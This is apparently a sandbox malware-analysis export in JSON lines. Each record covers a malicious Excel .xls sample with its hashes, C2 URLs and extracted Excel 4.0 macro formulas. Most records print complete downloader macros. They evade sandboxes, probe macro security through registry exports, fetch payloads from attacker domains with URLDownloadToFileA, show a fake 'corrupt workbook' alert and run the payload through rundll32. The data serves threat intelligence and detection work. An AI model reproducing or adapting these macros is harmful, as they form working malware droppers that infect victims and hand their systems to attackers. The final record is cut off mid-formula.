{"version":"0.2","sample":{"sample":"","kind":"file","target":"017bc2aac32ce5d66565675d89d2d2b65988a5c3ebf5624ceacb521a7be7a8a0"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"017bc2aac32ce5d66565675d89d2d2b65988a5c3ebf5624ceacb521a7be7a8a0","filesize":170496,"md5":"b8c44d151d21997f82dc753f035825fc","sha1":"bc2f9cfbf0c5979289761d98f68bac7c120ba71b","sha256":"017bc2aac32ce5d66565675d89d2d2b65988a5c3ebf5624ceacb521a7be7a8a0","sha512":"7c32e6fbbb88f63f622cc24d45da41f9d1773eb61ca0b386659e83023cdadda602cea7a4b626e405fd3996d7dc63b8715b5c1ea0d79ed382bd3ae8e6c3516761","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"017bc2aac32ce5d66565675d89d2d2b65988a5c3ebf5624ceacb521a7be7a8a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wRqQmSV5kh\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01801da56488269388728a9dd2984441ceb1af05ac45db71c41ae62b6215df61"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01801da56488269388728a9dd2984441ceb1af05ac45db71c41ae62b6215df61","filesize":209920,"md5":"4e3f6e2d821698d74ea5d5d847c7d010","sha1":"7c7aeafd4f66a71f4b990e2759ee8bcae446199a","sha256":"01801da56488269388728a9dd2984441ceb1af05ac45db71c41ae62b6215df61","sha512":"58d6a65534b0244c05b8ab2be52edfa62dd2a424a9b6d319c56e673eb088908401a49984c4196fa832a5fe9ccb8e451eb04d58c1d00516b770dbb2508a37f835","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01801da56488269388728a9dd2984441ceb1af05ac45db71c41ae62b6215df61.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5Sth51VWmA\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"018344e0544c3f555f0a52a8d98b772c3b36f0a4dfd3333855a826b0cc5eef58"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"018344e0544c3f555f0a52a8d98b772c3b36f0a4dfd3333855a826b0cc5eef58","filesize":112128,"md5":"2dad5304e853032c0267ef978ca7bcd8","sha1":"e6b04006ce174c959a697696dc2328df544689cd","sha256":"018344e0544c3f555f0a52a8d98b772c3b36f0a4dfd3333855a826b0cc5eef58","sha512":"9a344f4ac168b0410f669a416eef6e5c2ab0fdf65fdad6259809f95dd9739bb1f33701a4e40ddf77d3fbc8b648201defeb4ae985e01217532ab2b28a51f4bacc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"018344e0544c3f555f0a52a8d98b772c3b36f0a4dfd3333855a826b0cc5eef58.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01837e5ee7baae6d5397531606ca43550aba345b7eb373bbdfa8a7e82a288f87"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01837e5ee7baae6d5397531606ca43550aba345b7eb373bbdfa8a7e82a288f87","filesize":65024,"md5":"dd7e99b8cbe1bb6279ffac81b4244311","sha1":"a349f51cdd66fedf78a8708986157685860019c3","sha256":"01837e5ee7baae6d5397531606ca43550aba345b7eb373bbdfa8a7e82a288f87","sha512":"fe65786902079b701c8956592be49080e70a614ad7fefb6843f4a0dc8700e06bb4269e0c908169e3b99d0be7dd586bb142611b2a6b9e9f7e0e1ed795132deacc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01837e5ee7baae6d5397531606ca43550aba345b7eb373bbdfa8a7e82a288f87.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$26C$11,0,0)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"019e1ab080d8406852fa0ecb2b2b0810c838f1eef4dc468f56867856a1e76d0a"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"019e1ab080d8406852fa0ecb2b2b0810c838f1eef4dc468f56867856a1e76d0a","filesize":206336,"md5":"9b576796b66295d6ee612c8fc11c5085","sha1":"787ea7a19e8da52089dea7e62eb08a44fb4c601e","sha256":"019e1ab080d8406852fa0ecb2b2b0810c838f1eef4dc468f56867856a1e76d0a","sha512":"3f4226cb617d41ae4babafde799b4e7def08207acdb8a03bf30e1d13d883005d17ebe5f2248a27efafbe5a1c54051afe11f9f40d2f60e06315833a5402f86f96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"019e1ab080d8406852fa0ecb2b2b0810c838f1eef4dc468f56867856a1e76d0a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1RCWDL7Ah1\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01a3db5bd33c811bf32956e08e5886cb4d45053ecf493c7ff0a606fcd8e7fb2f"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01a3db5bd33c811bf32956e08e5886cb4d45053ecf493c7ff0a606fcd8e7fb2f","filesize":209920,"md5":"a58406d2d0aa2386077d51fd49f2b0ba","sha1":"79d95ac4b45b20a15476a661f4d8e8a387ee4b43","sha256":"01a3db5bd33c811bf32956e08e5886cb4d45053ecf493c7ff0a606fcd8e7fb2f","sha512":"e19b094834576cf123fc3f89c0b48df8f1a51413cf72ab0e29f1df693dcb774d098def287e65de66aba53ae39a80fa2dc081c4ae0122ae33c962852aa1410a5d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01a3db5bd33c811bf32956e08e5886cb4d45053ecf493c7ff0a606fcd8e7fb2f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Nd5N8199Mv\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01a940ce49c1a648c5ff0744792b174452873ac21d1898a6a2c239a861863e33"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01a940ce49c1a648c5ff0744792b174452873ac21d1898a6a2c239a861863e33","filesize":113152,"md5":"469fa8b8d461bd884ff7417fcc21fc30","sha1":"cba5cbc2dc4a78c9a238825cb2938e68cc76b265","sha256":"01a940ce49c1a648c5ff0744792b174452873ac21d1898a6a2c239a861863e33","sha512":"24588df3b6459c8de6774425bdccdafca83520f922e59ad1a6765a84214e1ca05081eb1ef5438c4684e20fb67ae4a9edbd0ec7565d50a687569868a722b896bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01a940ce49c1a648c5ff0744792b174452873ac21d1898a6a2c239a861863e33.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HALT()\nRETURN()\nRETURN()\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01b04911eb1d118b4709dc2fb3b1fdf8559dbac51b4b4ca7ac83e052eca193c6"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01b04911eb1d118b4709dc2fb3b1fdf8559dbac51b4b4ca7ac83e052eca193c6","filesize":170496,"md5":"e516450e0d07d9cac9a5e4f40e4dd3bc","sha1":"030f02d99af769237847aed4bb05a2fc89a38402","sha256":"01b04911eb1d118b4709dc2fb3b1fdf8559dbac51b4b4ca7ac83e052eca193c6","sha512":"9e67efb5d9427ae313f3ab6555bc9db6fb86f7c3626daa469cb4e8f505c4ecbca5eb227552970166a6b94c4cd541a88a8b336bcbc3e2ab2fe98b9be04b00370c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01b04911eb1d118b4709dc2fb3b1fdf8559dbac51b4b4ca7ac83e052eca193c6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lgL11Zhqgd\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01b7277da74999a20a02565149873f1d458a98b2482a34d41681b784b9b749a6"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01b7277da74999a20a02565149873f1d458a98b2482a34d41681b784b9b749a6","filesize":185344,"md5":"97789b436b49b36eb43787f9085a56f8","sha1":"bf43f61d4d61005bf8df1f143a56a8e5f310451e","sha256":"01b7277da74999a20a02565149873f1d458a98b2482a34d41681b784b9b749a6","sha512":"097dee3426d98e24a1965fba2c89ca70a7b49d2e15572e2fdd2917c75a68e96fbb9fb8db02f4db7af9988052a44b9453b14205bc190a1edb72c9c47775a729e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01b7277da74999a20a02565149873f1d458a98b2482a34d41681b784b9b749a6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01c21d551d21382be37600764aca6c990eb02696ae56acc854302da299558f08"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01c21d551d21382be37600764aca6c990eb02696ae56acc854302da299558f08","filesize":160768,"md5":"6a7af18de093f1f78836f262713a3dab","sha1":"2be2e89fe0cd37c6bdaf34c2c9dd7aa6bf496bd1","sha256":"01c21d551d21382be37600764aca6c990eb02696ae56acc854302da299558f08","sha512":"899665793a0070b1d5f0c14bc3d5c09bb3956ad1cc617380e2569e8e5951142c4bf019c8a5fcf46e680a74f88b767b2c343df60173569a4b0d57343de93d28e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01c21d551d21382be37600764aca6c990eb02696ae56acc854302da299558f08.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"W8WkOIo1v1\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01cb7ee69bac5d881fddb4fe8871aab3383785cf228a4edd4e246a6dd6b2ae5d"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01cb7ee69bac5d881fddb4fe8871aab3383785cf228a4edd4e246a6dd6b2ae5d","filesize":152576,"md5":"beeedb10b04cf82297f1a920e42d7e74","sha1":"2b0cfbbd4b004fbca8be714ee1010fd7fa729091","sha256":"01cb7ee69bac5d881fddb4fe8871aab3383785cf228a4edd4e246a6dd6b2ae5d","sha512":"f0c20947bd55e63368d2c85bc450418bcddf0b20fdb1c0392af8b723a616b5fc7a0f24af1144745e3cca4d72d9ecd7e7986e0292c1038928a2c0aaf16e2fea0a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01cb7ee69bac5d881fddb4fe8871aab3383785cf228a4edd4e246a6dd6b2ae5d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yQ9pj7nP5G\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01de16eead99f8a19b76e21eba7e79e723bca77ea513cf4cca201b021e492421"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01de16eead99f8a19b76e21eba7e79e723bca77ea513cf4cca201b021e492421","filesize":209920,"md5":"f14c87b664d36f267313f54dcf6b6da8","sha1":"e1ed3567ed472107ed70879fac937a692b55adc4","sha256":"01de16eead99f8a19b76e21eba7e79e723bca77ea513cf4cca201b021e492421","sha512":"9c2be7b4e3c912caea14f84575a527f595b72e49438fd174a32c6f5bacb22631b3cfc420b85ea35f51c7e59d6e8f8b988dec722f1589479e9e5ad470e5891968","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01de16eead99f8a19b76e21eba7e79e723bca77ea513cf4cca201b021e492421.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"svSBDZcZh0\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"01e4b1c5789be2e926404e34508f95d517565220795156f7ba0b47b01171448a"},"analysis":{"reported":"2020-04-09T16:14:38Z","score":10},"files":[{"filename":"01e4b1c5789be2e926404e34508f95d517565220795156f7ba0b47b01171448a","filesize":209920,"md5":"8349d3ea3f6257ba009cd31780478f1d","sha1":"d9bb53f7bd6610f72a3419bb76a07a42e161b50f","sha256":"01e4b1c5789be2e926404e34508f95d517565220795156f7ba0b47b01171448a","sha512":"eddc7acce57098e12c33ca8ba988ed3b1d80870a4f3eb2e4e34ad785f22fc2f9ad9f54335747af6b4fb8abdfa86197c84720814d01803c67993472741fff006a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"01e4b1c5789be2e926404e34508f95d517565220795156f7ba0b47b01171448a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BRUUY250YW\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02077671ce492ddd1e00c55e67986bae5c2041a21ead2de8254499fc9925406f"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"02077671ce492ddd1e00c55e67986bae5c2041a21ead2de8254499fc9925406f","filesize":185344,"md5":"144c0d99e6453c54f1978d9593a68f0d","sha1":"20c5be6b6523990118429e5fb58eec48a6a25873","sha256":"02077671ce492ddd1e00c55e67986bae5c2041a21ead2de8254499fc9925406f","sha512":"31dee6d2e4c24fe3d3fa866be8586d50803fc9e3b96d29741135691fd68c07e8ecca71bae496fb5358d01ad0effbeeef395954fc357870538e83e4d851672a3c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02077671ce492ddd1e00c55e67986bae5c2041a21ead2de8254499fc9925406f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"020fe7771104be60c0c7797416893aea6ee5a1aefab3bd973b9dde8ccd645132"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"020fe7771104be60c0c7797416893aea6ee5a1aefab3bd973b9dde8ccd645132","filesize":104448,"md5":"9f9a79253d554d83cb42428fea6beb3f","sha1":"ecb44daac94e09bf956114be60b4a8618c658a88","sha256":"020fe7771104be60c0c7797416893aea6ee5a1aefab3bd973b9dde8ccd645132","sha512":"a7ca6c69a0e319295d12f85754d085023716a202756d778f04aeccb71e53682353930981a2a00db2db38d1e8aeed73029ca9dd35848acf963b11a719f5f5fedb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"020fe7771104be60c0c7797416893aea6ee5a1aefab3bd973b9dde8ccd645132.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"GRNe6YdYPi\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0222a727e5238f235428ccf8814c249d1cda5cdb3a5accb0e2c0fe7a00437ec7"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"0222a727e5238f235428ccf8814c249d1cda5cdb3a5accb0e2c0fe7a00437ec7","filesize":167936,"md5":"3698ff309027cbe383bcbc952e40c3a3","sha1":"ff162b829662245f7c97c657a85784102d7f4ccf","sha256":"0222a727e5238f235428ccf8814c249d1cda5cdb3a5accb0e2c0fe7a00437ec7","sha512":"15353d5492ef1b064302ff31b00c0e7ff62224bc8fdf933e28eb9fda633ce013faa0e5c647139ca3720f8d76dfa55469de473965cf7dd206826d108f51592a29","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0222a727e5238f235428ccf8814c249d1cda5cdb3a5accb0e2c0fe7a00437ec7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 